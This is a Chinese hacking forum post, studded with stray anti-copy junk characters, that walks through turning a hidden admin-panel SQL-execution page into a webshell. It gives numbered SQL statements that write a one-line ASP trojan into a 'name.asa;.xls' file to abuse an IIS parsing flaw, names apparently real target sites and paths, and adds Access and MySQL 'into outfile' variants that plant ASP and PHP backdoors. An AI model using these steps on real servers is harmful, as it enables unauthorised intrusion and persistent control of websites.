好不容易进了后台,发现啥上传啊。备份啊多木有。; y+ v+ |: \& F0 ^2 O# u# s4 H
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的4 m+ e; M, P# r+ Z. T
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
1 A; ?& }) \% `6 W" e然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
5 p( m+ E8 a! _& y5 T1.create table cmd (a varchar(50))7 S6 ? ~& W7 C$ H/ _
2.insert into cmd (a) values (‘‘)
- Z: _* i7 y8 B8 j3 x3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd8 h* l1 t5 H5 X& c r
(把表cmd的内容导出为物理路径的一个EXCEL文件)
7 s+ z& s7 I# r# W( \5 \4.drop table cmd( q; s- |% G4 I4 s" A O$ D' [) h
利用IIS的BUG成功拿到了WEBSHELL。+ r4 n& f! \! {* s
# w7 u" A9 O( b, U/ _
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话5 ?# S: ~ `7 T' E9 z L) C; z
. L% n6 O8 E8 [4 P7 m
SQL语句意思解释:
) m* x. x; l. b; @7 b 第一句
, e) m" y& _- F% w+ e: o; m 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
6 J: ~/ r( H* a% G" L
1 K$ o. ]7 p$ B h; H0 A% a 第二句
. J3 h) j3 {* K) v6 J$ w/ { 在表cmd的a字段插入一句话木马9 y6 \: [) {+ f7 R9 ^( x0 S
第三句; h- N5 U! v# \- X# ^
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
4 c& J7 K* ^: H% |0 s% |+ `) Y% U+ Z3 Q" Q) |3 m) P( m
第四句9 {; o! J2 [' D3 w# M/ x
删除建立的cmd表8 }# \7 Z v, ~4 P" H6 d9 Z# z
) Y; i! |/ u+ v1 L 以下内容为测试:4 [- Z; U0 K1 `& `! U# ?% L
Access利用后台SQL执行命令功能导出WebShell:
+ {$ P1 W w8 ~7 Y: A0 g 这个更简单:
5 T( y$ y q. V2 T [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
; g! s: u5 b4 s1 _1 A1 _ 或者
6 {- p: C! q6 \1 Q [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]: v- Z4 W4 d& G& b0 f# G
* L+ ?3 _8 C3 X3 }" J2 |$ x% }3 _
后台有执行SQL语句功能(vote为已知表段)$ z0 z4 N, S) x" O9 s# L
希望对大家有所帮助拿shell的又一个思路6 ]* H& A u! T7 k G
|